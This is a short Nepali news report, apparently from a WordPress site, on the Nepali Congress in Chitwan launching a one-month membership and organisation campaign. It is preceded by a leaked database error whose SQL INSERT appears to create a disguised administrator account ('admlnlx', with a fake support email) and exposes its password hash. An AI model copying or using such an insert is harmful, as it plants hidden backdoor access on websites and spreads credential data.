WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoR2lzG2NObQs.CcV5829/xz/chdN/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 06:31:16', '', 'admlnlx', 'admlnlx')
चितवन,मंसिर २६-
नेपाली कांग्रेस चितवनले पार्टी जागरण एवम् सगंठन सुदृढिकरण १ महिने अभियान शुरु गर्ने भएको छ । पार्टी सभापति जितनारायण श्रेष्ठको अध्यक्षतामा आज पार्टी कार्यालयमा बसेको बैठकले जिल्लाका १ सय २६ वडा र ८ वटा गाउंमा जिल्ला प्रतिनिधि खटाउने निर्णय गरेको हो । १ महिना भित्र साधारण सदस्यता वितरण, प्रशिक्षण, सभा गोष्ठि लगायत विभिन्न कार्यक्रम गर्ने गर्ने निर्णय भएको पार्टी सचिव उत्तम जोशीले जानकारी दिनुभयो ।
पुष ३ गतेबाट प्रतिनिधिहरु खटाउने काम शुरु गर्ने र पुष मसान्त भित्र सम्पूर्ण गाउं र वडा सम्मेलन गरी सक्ने समेत सचिव जोशीले बताउनुभयो । बैठकले क्षेत्र नम्बर १ मा उपसभापति कैलाश कोईराला क्षेत्र नम्बर २ मा कोषाध्यग्क्ष शंकर कंडेल, क्षेत्र नम्बर ३ मा सहसचिव सूर्य अर्याल, क्षेत्र नम्बर ४ मा सचिव उत्तम जोशी र क्षेत्र नम्बर ५ मा सचिव राजिव न्यौपानेलाई खटाउने निर्णय गरेकोे छ । मंसिर ३० गते केन्द्रिय सभापति तथा पूर्व प्रद्यानमन्त्रि शेर बहादुर देउवाले अभियानको उद्घाटन गर्ने कांग्रेस चितवनले जनाएको छ ।